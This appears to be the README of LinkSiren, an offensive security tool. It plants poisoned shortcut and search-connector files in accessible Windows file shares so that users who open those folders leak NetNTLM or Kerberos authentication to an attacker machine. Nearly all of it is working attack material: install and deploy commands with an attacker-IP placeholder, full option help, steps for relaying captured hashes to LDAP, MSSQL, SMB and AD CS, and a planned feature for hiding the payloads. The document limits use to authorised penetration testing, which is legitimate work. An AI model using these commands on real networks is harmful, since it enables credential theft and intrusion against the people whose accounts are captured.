The Siren waits thee, singing song for song. - Walter Savage Landor
LinkSiren is your new favorite escalation tactic when you're stuck as a non-privileged user with lots of access to file shares. LinkSiren distributes .library-ms, .searchConnector-ms, .url, and .lnk files to optimal locations in accessible file shares to coerce NetNTLM and Kerberos authentication over SMB and HTTP from users that open them and stars the Webclient service on their machines. It's like Farmer, Lnkbomb, or Slinky but it identifies the best place to put the files for maximum coercion, has scalable deployment and cleanup built in, and generates detailed logs useful for client engagements.
Using uv (Recommended)
# Install from the main branch
uv tool install git+https://github.com/gjhami/LinkSiren.git
# uv tool install linksiren # Or install the latest release from PyPi
# Identify optimal locations for poisoned file deployment
linksiren identify --targets <shares file> [domain]/username[:password]
# Deploy to identified locations
linksiren deploy --attacker <attacker IP> [domain]/username[:password]
# Capture hashes / relay authentication / exploit the WebClient service
# Cleanup poisoned files
linksiren cleanup [domain]/username[:password]- Create a targets file for crawling containing accessible hosts, shares, or folders on each line in the following format. If a host is specified, shares will be identified on the host and treated as the next level of depth for crawling:
\\server1.domain.tld\
\\server2.domain.tld\share1
\\server3.domain.tld\share2\folder1\subfolder1
- Use LinkSiren to crawl the provided paths to the specified depth, searching for the ideal location to place a file that will coerce authentication. Resulting UNC paths are saved in
folder_targets.txtin the current directory.
# Note: You may fine tune the --max-depth, --active-threshold, --fast, and --max-folders-per-share params as necessary.
# You may also fine tune --max-concurrency to improve performance.
# Note: Specify '.' as the domain to log in using a local user account
linksiren identify --targets targets.txt [domain]/username[:password]- Use LinkSiren to deploy payloads to the locations identified in step 2. Optionally, specify a payload name and extension. The payload type (.searchConnector-ms, .library-ms, .lnk, or .url) will be selected automatically from the extension. Folders where payloads were successfully written are saved to
payloads_written.txt. Use the hostname or DNS name of the attacker host and perform poisoning as necessary to get intranet zoned, as described in my blog post DNS Hijacking: Say My Name and theHackerRecipes, to coerce HTTP authentication.
linksiren deploy --attacker <attacker IP> [domain]/username[:password]-
Let the hashes come to you and relay them as you see fit :)
- Find LDAP(S) Targets: Use LdapRelayScan or NetExec's ldap-checker to identify LDAP services vulnerable to relay.
- Find MSSQL Targets: Use mssqlrelay to identify MSSQL services that do not enforce encryption and are therefore vulnerable to relay. Also, consider combining this with information about Microsoft Configuration Manager to perform TAKEOVER-1.
- Find SMB Targets: Use NetExec's SMB functionaltiy to identify SMB services vulnerable to relay.
- Find HTTP Targets: Use this one-liner to check for ADCS ESC8 without authentication, or use NetExec/Certipy/Certify with authentication to identify ESC8 and other escalation paths as described by TheHackerRecipes that may also be viable relay targets.
- Use NTLMRelayx from Impacket to relay to identified targets with pcredz for hash capture on the attacker machine. I highly recommend
-socksmode with NTLMRelayx. - Krbjack or Krbrelayx could be used to relay Kerberos authentication to a machine if you can create a DNS record thanks to the a technique published by James Foreshaw and described in a blog post from Synacktiv. Domain users may create new DNS records by default and creating new DNS records is often possible without authentication thanks to DDSpoof. Note that the target service for the relay attack must map to the same service class as the relayed authentication and the service must not implement signing, channel binding, or extended protection for authentication.
-
Cleanup the payload files when the attack is finished. LinkSiren will output messages about any previously written payloads that it isn't able to successfully delete directly to console.
linksiren cleanup [domain]/username[:password]-
Scan for the WebClient service, now likely started on several machines, see theHackerRecipes for details. See this BHIS presentation Attack Tactics: Shadow Creds for Privesc for how HTTP authentication coerced from the service can be used privesc and lateral movement. Additionally see my blog post Files that Coerce for details of how a machine, once taken over using shadow credentials, can be used to coerce authentication from logged in users.
-
If necessary, review the linksiren log which can be filtered on Timesamp, log level (Level), Message, UNC Path (Path), user@domain (User), tool mode (Mode), and exception text if present (Exception).
# Filter by target (ex. 10.0.1.126)
cat linksiren.log | jq '. | select (.Path | startswith("\\\\10.0.1.126"))'
# Filter log level (ex. ERROR)
cat linksiren.log | jq '. | select (.Level == "ERROR")'
# Filter by current UTC timestamp. Truncate the format sting to show logs from the current minute/hour/day/month
cat linksiren.log | TZ=UTC jq '. | select (.Timestamp | startswith(now | strflocaltime("%Y-%m-%dT%H:%M:%S")))'
# Filter by time window specified in ISO 8601 format (ex. start timestamp=1; end timestamp=9999999999)
cat linksiren.log | TZ=UTC jq '. | select (.Timestamp + "Z" | fromdateiso8601? > 1 and fromdateiso8601? < 9999999999)'- (Optional) Get Intranet-Zoned if you want to coerce HTTP authentication. See the note in theHackerRecipes WebClient Abuse and my blog post DNS Hijacking: Say My Name.
- Create a list of UNC paths to writeable SMB shares.
- Note: You may also just provide a list of hosts (ex.
\\<host>). Linksiren will list the shares on the host and add the base folder of each share as a target. - Note: Consider write and delete privileges are distinct on Windows. It is possible you can create a poisoned file but will not have permissions to delete it. If LinkSiren is unable to cleanup a payload it deplyed, then it will be very verbose in letting you know.
- Note: You may also just provide a list of hosts (ex.
- [Optional] Run LinkSiren in
generatemode to write templates locally - [Optional] Run LinkSiren in
rankmode to output rankings for accessible folders based on recent access. - Run LinkSiren in
identifymode to find the best places to put poisoned files. - Start a listener or relay on your attacker machine to capture and/or relay coerced authentication to services without Signing/Channel Binding like LDAP, MSSQL, SMB, AD CS (HTTP), and others.
- Run LinkSiren in
deploymode to place payloads in the optimal locations identified. - Let the hashes roll in. Relay and/or crack as desired.
- Run LinkSiren in
cleanupmode to delete all the poisoned files.
LinkSiren offers the following modes of operation:
Create poisoned files to use for coercion and store them locally.
Usage
linksiren generate --help
usage: linksiren generate [-h] -a ATTACKER [-n PAYLOAD]
Output specified payload file to the current directory instead of a remote location.
options:
-h, --help show this help message and exit
-n PAYLOAD, --payload PAYLOAD
(Default: @Test_Do_Not_Remove.searchConnector-ms) Name of payload file ending in .library-ms, .searchConnector-ms, .lnk, or .url
Required Arguments:
-a ATTACKER, --attacker ATTACKER
Attacker IP or hostname to place in malicious URL
Given a list of accessible shares or hosts, output ranks for the folders within them based on the liklihood placing a file in the folder will coerce authentication from a user.
Usage
linksiren rank --help
usage: linksiren rank [-h] -t TARGETS [-md MAX_DEPTH] [-at ACTIVE_THRESHOLD] [-f] [-is IGNORE_SHARES [IGNORE_SHARES ...]] [-mc MAX_CONCURRENCY] credentials
Output identified subfolders and rankings to folder_rankings.txt
options:
-h, --help show this help message and exit
-md MAX_DEPTH, --max-depth MAX_DEPTH
(Default: 3) The maximum depth of folders to search within the target.
-at ACTIVE_THRESHOLD, --active-threshold ACTIVE_THRESHOLD
(Default: 2) Number of days as an integer for active files.
-f, --fast (Default: False) Mark folders active as soon as one active file in them is identified and move on. Ranks are all set to 1 assigned.
-is IGNORE_SHARES [IGNORE_SHARES ...], --ignore-shares IGNORE_SHARES [IGNORE_SHARES ...]
(Default: 'C$' 'ADMIN$' 'SYSVOL') Do not review the contents of specified shares when crawling as part of the folder ranking process.
-mc MAX_CONCURRENCY, --max-concurrency MAX_CONCURRENCY
(Default: 4) Max number of concurrent processes to use for crawling in rank and identification modes. Note: a maximum of 1 process is used per host. So linksiren will never make multiple simultaneous connections to the same host and concurrent processing will not
accelerate crawling multiple shares on a single host.
Required Arguments:
credentials [domain/]username[:password] for authentication
-t TARGETS, --targets TARGETS
Path to a text file containing UNC paths to file shares / base directories within which to rank folders as potential locations for placing poisoned files.
Given a list of accessible shares or hosts and customizable constraints, including a maximum number of target folders per share, output UNC paths to the optimal folders for placing poisoned files.
Usage
linksiren identify --help
usage: linksiren identify [-h] -t TARGETS [-md MAX_DEPTH] [-at ACTIVE_THRESHOLD] [-f] [-is IGNORE_SHARES [IGNORE_SHARES ...]] [-mf MAX_FOLDERS_PER_TARGET] [-mc MAX_CONCURRENCY] credentials
Identify target folders for payload distribution and output to payload_targets.txt
options:
-h, --help show this help message and exit
-md MAX_DEPTH, --max-depth MAX_DEPTH
(Default: 3) The maximum depth of folders to search within the target
-at ACTIVE_THRESHOLD, --active-threshold ACTIVE_THRESHOLD
(Default: 2) Max number of days since within which a file is considered active.
-f, --fast (Default: False) Mark folders active as soon as one active file in them is identified and move on. Ranks are all set to 1.
-is IGNORE_SHARES [IGNORE_SHARES ...], --ignore-shares IGNORE_SHARES [IGNORE_SHARES ...]
(Default: 'C$' 'ADMIN$' 'SYSVOL') Do not review the contents of specified shares when crawling as part of the folder ranking and optimal poisoning folder identification process.
-mf MAX_FOLDERS_PER_TARGET, --max-folders-per-target MAX_FOLDERS_PER_TARGET
(Default: 10) Maximum number of folders to output as deployment targets per supplied target share or folder.
-mc MAX_CONCURRENCY, --max-concurrency MAX_CONCURRENCY
(Default: 4) Max number of concurrent processes to use for crawling in rank and identification modes. Note: a maximum of 1 process is used per host. So linksiren will never make multiple simultaneous connections to the same host and concurrent processing will not
accelerate crawling multiple shares on a single host.
Required Arguments:
credentials [domain/]username[:password] for authentication
-t TARGETS, --targets TARGETS
Path to a text file containing UNC paths to file shares / base directories to crawl for optimal locations to write poisoned files.
Generate poisoned files for coercion and deploy them to specified UNC paths. Typically the specified UNC paths are the output of identify mode. Output a list of UNC paths to folders where payloads were successfully deployed for cleanup.
Usage
linksiren deploy --help
usage: linksiren deploy [-h] -a ATTACKER [-t TARGETS] [-n PAYLOAD] credentials
Deploy payloads to all folder UNC paths listed one per line in the file specified using --targets
options:
-h, --help show this help message and exit
-t TARGETS, --targets TARGETS
(Default: 'payload_targets.txt') Path to a text file containing UNC paths to folders into which poisoned files will be deployed.
-n PAYLOAD, --payload PAYLOAD
(Default: @Test_Do_Not_Remove.searchConnector-ms) Name of payload file ending in .library-ms, .searchConnector-ms, .lnk, or .url
Required Arguments:
credentials [domain/]username[:password] for authentication
-a ATTACKER, --attacker ATTACKER
Attacker IP or hostname to place in poisoned files.
Remove all payloads from the specified UNC paths, typically the output of deploy mode.
Usage
linksiren cleanup --help
usage: linksiren cleanup [-h] [-t TARGETS] credentials
Delete poisoned files from folder UNC paths specified in --targets
options:
-h, --help show this help message and exit
-t TARGETS, --targets TARGETS
(Default: 'payloads_written.txt') Path to a text file containing UNC paths poisoned files to clean up.
Required Arguments:
credentials [domain/]username[:password] for authentication
Search Connectors (.searchConnector-ms): This is generally the best option. They require the least amount of interaction, start the WebClient service from a stopped state automatically when the parent folder is opened in Explorer, and are capable of coercing both SMB and HTTP authentication using a single file.
Summary
- Scales to an arbitrary number of malicious .searchConnector-ms, .library-ms, .url, or .lnk files
- Targeted malicious file placement
- Single command deployment and cleanup
- Cross platform with python
As in real estate, consider the three most important things when attempting to coerce auth using files: location, location, location. All techniques identified here only coerce authentication from users that open the folder containing the poisoned file.
Other tools are built to place a single malicious .searchConnector-ms, .library-ms, or .url file at a specified location and clean up that one malicious file. If you find yourself with access to a lot of shares, then you may want things to scale and you may not be in the mood to write a wrapper. Additionally, you may not know the best place to put a poisoned file in a sea of accessible shares.
LinkSiren crawls accessible shares and ranks every subfolder based on the liklihood it will be opened by a user sometime soon. Then it uses this information to target malicious file distribution to multiple locations at once. Additionally, LinkSiren records the full UNC path of malicious files it creates, allowing for cleanup with a single command.
I'm looking to add the following features:
- Test the tool through a socks proxy connection to an smb share generated using ntlmrelayx.
- Add safety features:
- Check if a file exists before overwriting it with a payload in deploy mode.
- Check if files can be deleted from a target path before creating a payload there.
- Add the ability to deploy files encrypted with EFS to trigger the start of the Encrypting File Service on Windows 11 machines so authentication can subsequently be coreced using tools like Coercer and PetitPotam.
- Add an option for 'invisible' targets for .Library-ms and .searchConnector-ms files where the icon is set to blank and the name is set to a non-printing, valid ASCII character.
- Test for anonymous access to shares.
- Enable authentication using a NTLM hash.
- Enable ticket based authnentication (Kerberos).
This tools is designed for ethical hacking and penetration testing. It should be used exclusively on networks where explicit, written permission has been granted for testing. I accept no responsibility for the safety or effectiveness of this tool. Please don't sue me.